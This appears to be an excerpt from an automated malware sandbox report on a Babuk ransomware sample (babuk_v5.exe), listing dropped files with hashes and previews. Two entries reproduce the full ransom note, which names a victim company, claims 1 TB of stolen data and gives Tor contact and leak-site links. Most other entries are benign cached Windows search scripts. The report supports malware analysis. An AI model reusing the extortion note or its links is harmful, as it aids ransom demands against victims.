                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.549669283179742
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlP4Sse9lBfGOL9sMZ8UiyeK8ZigV+gxEn98UY8wgXZp6TW4o7aKcDT/c9UxNvEE:A2hOOJs3ye4Q2987gn4W4maHX/c90vtn
                                                                            MD5:D3852AA6E0EC1E38DDD963D95FAB9552
                                                                            SHA1:05D3AAF10709412E38A41EB686F81200B50A5E2B
                                                                            SHA-256:C3816654F0D27A13FC265C78560790D38CC1172326B8C67065652FE82E22F984
                                                                            SHA-512:506C0EFDC8047D6CA35EAB87A80A29EECFC414EF362C0CF980FAB6712433808064B8D2039CA7FBC32230D65A5BDF927B1C2B5F4A7141ACC374638ED533E345F4
                                                                            Malicious:false
                                                                            Preview: ......).@.N}..%.....l....A..7F.X.a)....r..1Q.^W{c..cl.A....t.A3B.....p1...0e....N..._}.......X.q=Wh[OU...^r|L_....t...k9..Ff........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):15771
                                                                            Entropy (8bit):5.09526529579509
                                                                            Encrypted:false
                                                                            SSDEEP:192:J/MS4lVzgNo0Hb0FAuV++JmzlqZ6GLIV87GI9BgJSY6+lzmu2Bp2aQbwyPcvsyDQ:V4mo07kV7JZ6GLIK7GfVp2Hpykvswb8
                                                                            MD5:E515E69B21C49A355D5D4B91764ABE00
                                                                            SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                                                                            SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                                                                            SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){n.TopLevelDomains={aaa:1,aarp:1,abarth:1,abb:1,abbott:1,abbvie:1,abc:1,able:1,abogado:1,abudhabi:1,ac:1,academy:1,accenture:1,accountant:1,accountants:1,aco:1,actor:1,ad:1,adac:1,ads:1,adult:1,ae:1,aeg:1,aero:1,aetna:1,af:1,afamilycompany:1,afl:1,africa:1,ag:1,agakhan:1,agency:1,ai:1,aig:1,aigo:1,airbus:1,airforce:1,airtel:1,akdn:1,al:1,alfaromeo:1,alibaba:1,alipay:1,allfinanz:1,allstate:1,ally:1,alsace:1,alstom:1,am:1,amazon:1,americanexpress:1,americanfamily:1,amex:1,amfam:1,amica:1,amsterdam:1,analytics:1,android:1,anquan:1,anz:1,ao:1,aol:1,apartments:1,app:1,apple:1,aq:1,aquarelle:1,ar:1,arab:1,aramco:1,archi:1,army:1,arpa:1,art:1,arte:1,as:1,asda:1,asia:1,associates:1,at:1,athleta:1,attorney:1,au:1,auction:1,audi:1,audible:1,audio:1,auspost:1,author:1,auto:1,autos:1,avianca:1,aw:1,aws:1,ax:1,axa:1,az:1,azure:1,ba:1,baby:1,baidu:1,banamex:1,bananarepublic:1,band:1,bank:1,bar:1,barcelona:1,barclaycard:1,barclays:1,barefoot:1,bargains:1,baseball:1,basketball:1,ba
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6584
                                                                            Entropy (8bit):5.431678053520003
                                                                            Encrypted:false
                                                                            SSDEEP:192:wESNgDI0VOD4uejPhA/c5jlTULbhCtE+h:fnb9ThtEe
                                                                            MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                                                                            SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                                                                            SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                                                                            SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                                                                            Malicious:false
                                                                            Preview: /** @license React v16.1.1.. * react.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */..'use strict';(function(p,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l():"function"===typeof define&&define.amd?define(l):p.React=l()})(this,function(){function p(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,e=0;e<b;e++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[e+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function l(a){return function(){return a}}function n(a,b,c){this.props=a;this.context=b;this.refs=v;this.updater=c||w}function x(a,b,c){this.props=a;this.context=b;this.refs=
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\OxkR0u1OdBld0ezo_UGFraNq4kc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):258192
                                                                            Entropy (8bit):5.36689739714049
                                                                            Encrypted:false
                                                                            SSDEEP:6144:xi4SvY90SnG9Fau5P9x8x/LrfkoKlU0/dUwKsUIPA:kZFauR0h0i
                                                                            MD5:24FFADCE7C2C668C4B64C2B6F6889DD8
                                                                            SHA1:93D252DF6A0CF542BFC177827EC0C93A3E9B74BF
                                                                            SHA-256:D11B6AFABEBD33DD82FBDAD46D5709D2D05EB5252AB9CE327276A6E77D1088CF
                                                                            SHA-512:DBE37572F9EAC7C06FA5864112E697B715447937D17909A57640FA72094D083816008535704B53895E92E024A5C44BD81F0F1CDDE7E6646B5E369CC1870D9FC5
                                                                            Malicious:false
                                                                            Preview: var __spreadArrays,WSB;(function(n){function t(){if(SearchAppWrapper.CortanaApp.hostingEnvironment==4)return 7;if(!n.isMiniSerpEnabled())return 0;var t=7;return n.config.allowAnswersToAutoOpenMiniSerp||(t&=-2),n.config.allowDNavToAutoOpenMiniSerp||(t&=-3),n.config.allowWebToAutoOpenMiniSerp||(t&=-5),t}var i=["::{679F85CB-0220-4080-B29B-5540CC05AAB6}","::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"],r=function(){function r(){this.refreshEntrypointApp()}return r.prototype.refreshEntrypointApp=function(){this.EntryPointApp=SearchAppWrapper.CortanaApp.hostingEnvironment==3?1:n.config.forceSettingsAppExperience?3:SearchAppWrapper.CortanaApp.hostingEnvironment==5||n.config.forceSantoriniExperience?4:SearchAppWrapper.CortanaApp.hostingEnvironment==4?2:0},r.prototype.clearDefaults=function(){this.QfMode=0;this.PreviewPaneAvailable=!1;this.MiniSERPMode=0;this.AlwaysWide=!1;this.SearchBoxOnTop=!0;this.AllowKeyboardNavCycling=!0;this.AllowKeyboardNavOffCanvas=!1;this.ScopesAvailable=!1;this.FlatListWi
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):17560
                                                                            Entropy (8bit):5.4266165365013235
                                                                            Encrypted:false
                                                                            SSDEEP:384:iTKwROpIbfMP+t4JdQFBfMlArU/HW8o/Z0Co/lo1LqEzubSfpj:wKwnfMP+EdQFBfMiA/2jR0n6wuj
                                                                            MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                                                                            SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                                                                            SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
                                                                            SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                                                                            Malicious:false
                                                                            Preview: !function(t,e){if("object"==typeof exports&&"object"==typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var n=e();for(var i in n)("object"==typeof exports?exports:t)[i]=n[i]}}(this,function(){return function(t){function e(i){if(n[i])return n[i].exports;var r=n[i]={exports:{},id:i,loaded:!1};return t[i].call(r.exports,r,r.exports,e),r.loaded=!0,r.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(1)},function(t,e,n){"use strict";var i=n(2);e.AWTPiiKind=i.AWTPiiKind;var r=n(3);e.AWT=r["default"],e.AWT_COLLECTOR_URL_UNITED_STATES="https://us.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_GERMANY="https://de.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_JAPAN="https://jp.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_AUSTRALIA="https://au.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_EUROPE="https://eu.pipe.aria.microsoft.com/Collector/3.0/"},function(t,e){"use st
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8204
                                                                            Entropy (8bit):5.24502306901906
                                                                            Encrypted:false
                                                                            SSDEEP:192:jTceevz/oCfPJQhDEWaMLccp+pZNpPpGIp6/rktQeH+t0B6LB+T1k:jTceevzlrDkmVRn6jk2OB6V+T1k
                                                                            MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                                                                            SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                                                                            SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                                                                            SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                                                                            Malicious:false
                                                                            Preview: var FailedPromise=function(){function n(){this.isActive=!0;this.operation=null}return n.prototype.then=function(n,t){return this.handleError(t),this},n.prototype.done=function(n,t){this.handleError(t)},n.prototype.handleError=function(n){this.isActive&&n&&_w.setImmediate(function(){return n(null)})},n.prototype.cancel=function(){this.isActive=!1},n}(),ThresholdUtilitiesM2=function(){function n(){this.regExes={};this.guidCleaner=/[-{}]/g;this.isFirstPageStart=!0;this.startTime=_w.performance?_w.performance.timing.navigationStart:si_ST;this.apiSequenceNumber=0;this.headersAsyncPromise=null;this.headersCallComplete=!1;this.cortanaHeaders=null;this.themeColor=null;this.isDarkTheme=null;this.headersCallTimeout=3e3;this.headersCallbacks=[];this.rtlLangs=["ar","dv","fa","he","ku-arab","pa-arab","prs","ps","sd-arab","syr","ug","ur","qps-plocm"];sj_evt.bind("ajax.threshold.authChanged",sj_dm(this,this.clearLocalCache),1);sj_evt.bind("ajax.threshold.pageStart",sj_dm(this,this.onPageStart),1)}ret
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3280
                                                                            Entropy (8bit):5.029628776196898
                                                                            Encrypted:false
                                                                            SSDEEP:48:uj4b+YGus4lTtA5j4b+YGuqVADSRR4J1UjQkWWWtJt0RE5hTL4JXhXjMpXvXVk:UJms4lGhJmquDevWgggh45/Vk
                                                                            MD5:65237D68849782412963C9B1A1DA22E5
                                                                            SHA1:3490F341E17FEAA7FB56D942539C24C5FA54A30A
                                                                            SHA-256:4B950875FDE265B75753C2A8BEC4588476A323036B38B360A3EDD2A22A106B49
                                                                            SHA-512:FB18BFB43AF2BC6BFFE020AF039D7BCD74B7CE1823D62026F6B5F231E51E024240E2F8B6399716DDFED2EDDECA6302B43D982256ADE02026AA0A6052C35085DF
                                                                            Malicious:false
                                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),WSB;(function(n){var t;(function(n){var t=function(t){function i(){return t!==null&&t.apply(this,arguments)||this}return __extends(i,t),i.prototype.render=function(){if(!this.props.dataModel)return null;var t=this.props.dataModel,r=t.message,i=t.cancel,u=t.showSpinner;return React.createElement("div",{className:"snipSearchMessage"},u&&React.createElement(n.AnimatedLoader,null),React.createElement("div",{className:"primaryText loaderMessage"},r),i&&React.createElement("button",{className:"loaderButton",onClick:i},n.getLocString("Cancel")))},i}(React.Component);n.SnipSearchMessage=t})(t=n.View||(n.View={}))})(WSB||(WSB={}));__ex
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6
                                                                            Entropy (8bit):2.584962500721156
                                                                            Encrypted:false
                                                                            SSDEEP:3:jUYn:jBn
                                                                            MD5:77373397A17BD1987DFCA2E68D022ECF
                                                                            SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                                                                            SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                                                                            SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                                                                            Malicious:false
                                                                            Preview: z{a:1}
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1515
                                                                            Entropy (8bit):5.095845525337584
                                                                            Encrypted:false
                                                                            SSDEEP:24:FhMzkuYmRdyVYu8nVHcJDDOXOI6bslnTUGqqJlnCz:3Mr1RdyVvUgDQFTkCQ
                                                                            MD5:08E47D1329ABE9AEAD433A8B2C4104B9
                                                                            SHA1:2A346278752888ED07A4E25CBD84B446BD6000DB
                                                                            SHA-256:D0373F0C4B0A4A7B1400C7388B3E37FDB96C2802BA9E98A9880F16094038DFBE
                                                                            SHA-512:51EF2C1093851C6B387EFF7FB2B28C07974BD80821C1F64555F168ADAD248DFC076699A21C8352A6A030091BA15174E1C175B66CFF6FE2B287AA20DBC295CC96
                                                                            Malicious:false
                                                                            Preview: z{a:1}.b_scopebar{background-color:#eee}.b_scopebar,.b_scopebar a,.b_scopebar a:visited,#b_header .b_symb{color:#767676}.b_scopebar li.b_active a,.b_scopebar li.b_active a:visited,.b_scopebar span{border-color:#f84e29;color:#000}.b_scopebar a,.b_scopebar span{text-decoration:none;text-transform:uppercase}.b_scopebar a{text-transform:capitalize}#b_header:not(:empty){border-bottom:1px solid #ccc;position:fixed;top:0;width:100%;z-index:1000}#b_header .b_symb{float:left}body[dir] #b_header .b_symb{margin:10px 10px 0 10px}body[dir='rtl'] #b_header .b_symb{float:right}.b_scopebar li{display:inline-flex}body[dir] .b_scopebar li{margin:0 10px}.b_scopebar li:last-child{flex:none}body[dir='ltr'] .b_scopebar li:last-child{margin-right:12px}body[dir='rtl'] .b_scopebar li:last-child{margin-left:12px}body[dir='ltr'] .b_scopebar li:first-child{margin-left:12px}body[dir='rtl'] .b_scopebar li:first-child{margin-right:12px}.b_scopebar ul{overflow-x:auto;white-space:nowrap;-ms-overflow-style:none}body[di
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):45447
                                                                            Entropy (8bit):4.519302585237155
                                                                            Encrypted:false
                                                                            SSDEEP:768:J0IPAyG9+tOMwFqTWbHUSiuAwmvqWf/LyZsXoUklYv/er/r3OwYEFGH0RhB78Wb+:J0IPX3f+Dglat5kmtW
                                                                            MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                                                                            SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                                                                            SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                                                                            SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,25)>.5?t(n,282)>.39824?.69957:t(n,11)>.5?-.10865:t(n,0)>.11348?-.43924:-.84281:t(n,10)>1.5?t(n,282)>.74998?.96874:t(n,264)>.2555?t(n,10)>2.5?t(n,103)>.75004?t(n,158)>4595?.45522:.86367:t(n,16)>4800.5?t(n,0)>.37977?.70215:.19872:t(n,8)>.5?t(n,38)>390296.5?.40772:.75656:.18243:t(n,2)>1.5?.4651:-.16901:t(n,41)>.1765?.90432:.44919:t(n,282)>.70002?.68892:t(n,2)>2.5?t(n,16)>3320.5?-.30696:.07806:-.53174}function r(n){return t(n,25)>.5?t(n,282)>.49998?.59407:t(n,17)>.77996?-.15554:-.67158:t(n,10)>1.5?t(n,282)>.66667?.80523:t(n,10)>3.5?t(n,41)>.5175?.77296:t(n,8)>.5?t(n,158)>6310.5?.272:t(n,38)>29401304?.07058:.63578:.16914:t(n,94)>.57635?t(n,39)>.0305?.32237:.68096:t(n,2)>2.5?t(n,38)>3203480.5?.02127:.50932:t(n,16)>5365.5?t(n,296)>.8325?-.37343:.20213:.1316:t(n,282)>.77894?.58741:t(n,16)>3833?-.41734:t(n,103)>.63135?.09324:-.23768}function u(n){return t(n,25)>.5?t(n,282)>.307
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):20407
                                                                            Entropy (8bit):5.305440084477046
                                                                            Encrypted:false
                                                                            SSDEEP:384:Kncvz0mcLDICWE8RtoW0W6jYRmUo0YZA9kE:BLo0CWE8RzQUcA9B
                                                                            MD5:DBA3A107C2F712A09965545FB5C09FAF
                                                                            SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                                                                            SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                                                                            SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                                                                            Malicious:false
                                                                            Preview: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:"."}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;color:#000;content:"."}.sw_playa:after,.sw_playd:after{color:#767676}.sw_playp:after{content:"."}.sw_plus:after,.sw_up:after,.sw_down:after{font-size:12px}.sw_down:after{content:"."}.sw_up:after{content:"."}.sw_st,.sw_sth,.sw_ste{line-height:12px}body[dir='ltr'] .sw_st,body[dir='ltr'] .sw_sth,body[dir='ltr'] .sw_ste{padding-right:1px}body[dir='rtl'] .sw_st,body[dir='rtl'] .sw_sth,body[dir='rtl'] .sw_ste{padding-left:1px}.sw_st:after,.sw_sth:before,.sw_sth:after,.sw_ste:after{font-size:12px;display:inline-block;color:#000}.sw_st:after{content:"."}.sw_sth{white-space:nowrap}.sw_sth:before{content:"."}body[dir='ltr'] .sw_sth:before{margin-right:-12px}body[dir='rtl'] .sw_sth:before{margin-left:-12px}.sw_sth:after{content:".";co
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\nE8O_74eRxPGRZXa8IWMjNlvBlM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):105581
                                                                            Entropy (8bit):6.295327137871007
                                                                            Encrypted:false
                                                                            SSDEEP:1536:KhbNqk75qk7mpGgK+x+HBCtXHdT3LoWw639QO/xbmNiMhfytmGI5bbFZjKj2GgAe:HTIBCtXHGWwsiiyf1P6gAe
                                                                            MD5:6C33E8E7D7B48FB45E591620419B7BCD
                                                                            SHA1:E12DDC6EBC41D9CAF90D5209661B088FCEF7444B
                                                                            SHA-256:8F5D7626F779AFCA70AFB53367B58A0EBD34A98EF97B1D090F04D853BBD19B7D
                                                                            SHA-512:33A6B0520BD4588FFC7A464383D8A8923DA81074F91A9D9A025CB2B2F4812831CEAA450C55390A340821EE29EC6C2798719E9A9BE135FA58B8CDC9C1A399DC83
                                                                            Malicious:false
                                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"LocStrings",namespace:"Feedback"},{DIALOG_ALIAS_ERROR_TEXT:t[0],DIALOG_ALIAS_LABEL:t[1],DIALOG_ALIAS_TEXT:t[2],DIALOG_ASK_FEEDBACK:t[3],DIALOG_CANCEL_BUTTON_TEXT:t[4],DIALOG_COMMENT_ERROR_TEXT:t[5],DIALOG_COMMENT_LABEL:t[6],DIALOG_COMMENT_TYPE_LABEL:t[7],DIALOG_COMMENT_TYPE1:t[8],DIALOG_COMMENT_TYPE2:t[9],DIALOG_COMMENT_TYPE3:t[10],DIALOG_COMMENT_TYPE4:t[11],DIALOG_COMMENT_TYPE5:t[12],DIALOG_COMMENT_TYPE6:t[13],DIALOG_INCLUDE_SCREENSHOT:t[14],DIALOG_MSFT_INTERNAL:t[15],DIALOG_PRIVACY_POLICY:t[16],DIALOG_SEND_BUTTON_TEXT:t[17],DIALOG_SEND_EMAIL_LABEL:t[18],LEARN_MORE_LINK_TEXT:t[19],PRIVACY_STATEMENT_LINK_TEXT:t[20],REPORT_LEGAL_OR_PRIVACY_CONCERN:t[21],WINDOWS_DIALOG_COMMENT_TEXT:t[22],WINDOWS_TITLE_TEXT:t[23]}),i}return i(n,t)})("af",["Voer asseblief jou alias in.","en cc my by","Voer jou alias hier in.","Het jy enige spesifieke terugvoer?","Kanselleer","Laat 'n kommentaar asseblief.","Teksvenster vir j
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\u0oEvt3OS1WUsDRSPSfTBUMXUaQ.br[1].js
